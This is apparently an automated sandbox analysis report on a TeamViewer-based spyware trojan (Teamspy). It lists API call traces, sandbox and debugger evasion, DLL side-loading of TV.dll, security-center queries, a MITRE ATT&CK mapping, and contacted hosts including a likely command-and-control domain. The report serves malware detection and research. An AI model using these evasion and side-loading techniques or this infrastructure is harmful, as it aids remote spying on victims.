Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: svchost.exe, 00000005.00000002.524751408.000002B018262000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.510529267.000002B012C29000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.281567558.0000000000BB8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.509723909.000001E20B602000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000009.00000002.510137559.000001E20B640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.510416688.0000024BA4E29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeOpen window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2000 GetSecurityInfo,GetNamedSecurityInfoA,GetProcessHeap,HeapAlloc,CreateWellKnownSid,SetEntriesInAclA,SetSecurityInfo,SetNamedSecurityInfoA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detectedShow sources
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5130 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Progman
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,753CA680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)Show sources
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000E.00000002.510485370.000001B2F323D000.00000004.00000001.sdmpBinary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510602015.000001B2F3302000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation111DLL Side-Loading11DLL Side-Loading11Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1DLL Search Order Hijacking2DLL Search Order Hijacking2Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution12Create Account1Valid Accounts2Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Access Token Manipulation21Software Packing1NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronWindows Service22Windows Service22DLL Side-Loading11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder1Process Injection12DLL Search Order Hijacking2Cached Domain CredentialsSecurity Software Discovery471VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Masquerading12DCSyncVirtualization/Sandbox Evasion22Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion22/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483795 Sample: 77Etc0bR2v.bin Startdate: 15/09/2021 Architecture: WINDOWS Score: 80 39 Multi AV Scanner detection for dropped file 2->39 41 Multi AV Scanner detection for submitted file 2->41 7 77Etc0bR2v.exe 14 2->7         started        10 TeamViewer.exe 11 14 2->10         started        14 svchost.exe 2->14         started        16 14 other processes 2->16 process3 dnsIp4 25 C:\Users\user\AppData\...\TeamViewer.exe, PE32 7->25 dropped 27 C:\Users\user\AppData\Roaming\...\TV.dll, PE32 7->27 dropped 29 C:\Users\user\...\Teamviewer_Resource_ja.dll, PE32 7->29 dropped 18 TeamViewer.exe 7->18         started        31 master15.teamviewer.com 185.188.32.25, 49746, 49747, 49748 TEAMVIEWER-ASDE Germany 10->31 33 outnegorave.info 172.67.205.33, 443, 49752, 49755 CLOUDFLARENETUS United States 10->33 37 2 other IPs or domains 10->37 51 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->51 53 Changes security center settings (notifications, updates, antivirus, firewall) 14->53 21 MpCmdRun.exe 14->21         started        35 127.0.0.1 unknown unknown 16->35 55 DLL side loading technique detected 16->55 file5 signatures6 process7 signatures8 43 Tries to detect sandboxes and other dynamic analysis tools (window names) 18->43 45 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->45 47 Creates processes via WMI 18->47 49 Contains functionality to detect sleep reduction / modifications 18->49 23 conhost.exe 21->23         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
77Etc0bR2v.exe38%VirustotalBrowse
77Etc0bR2v.exe11%MetadefenderBrowse
77Etc0bR2v.exe38%ReversingLabsWin32.Trojan.Teamspy

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll27%ReversingLabsWin32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
1.2.77Etc0bR2v.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
1.0.77Etc0bR2v.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://outnegorave.info/B8C631A8/mViewer0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=100000020%Avira URL Cloudsafe
http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001y#U0%Avira URL Cloudsafe
http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGate0%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/W0%Avira URL Cloudsafe
https://outnegorave.info/G0%Avira URL Cloudsafe
https://outnegorave.info/#0%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/40%Avira URL Cloudsafe
http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=100000010%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/;0%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/=0%Avira URL Cloudsafe
https://outnegorave.info/(0%Avira URL Cloudsafe
https://outnegorave.info/8C631A8/opmentProperties0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://178.255.154.140/ent=DynGate&p=100000020%Avira URL Cloudsafe
http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000%Avira URL Cloudsafe
http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002ter15.teamviewer.com0%Avira URL Cloudsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://outnegorave.info/8C631A8/opmentProperties:30%Avira URL Cloudsafe
https://outnegorave.info/S0%Avira URL Cloudsafe
https://dynamic.t0%URL Reputationsafe
https://outnegorave.info/B8C631A8/q0%Avira URL Cloudsafe
https://outnegorave.info/e0%Avira URL Cloudsafe
http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGatet0%Avira URL Cloudsafe
http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001.Windows.Phot0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://outnegorave.info/B8C631A8/0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
https://outnegorave.info/8C631A8/614&p=100000010%Avira URL Cloudsafe
https://outnegorave.info/8C631A8/V3e0%Avira URL Cloudsafe
https://outnegorave.info/0%Avira URL Cloudsafe
http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001p0%Avira URL Cloudsafe
http://go.teamviewer.comn00%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/lPanel.dll0%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGateu0%Avira URL Cloudsafe
http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGatet0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
outnegorave.info
172.67.205.33
truefalse
    		high
    master15.teamviewer.com
    		185.188.32.25
    		truefalse
      		high
      ping3.dyngate.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002false
        • Avira URL Cloud: safe
        		unknown
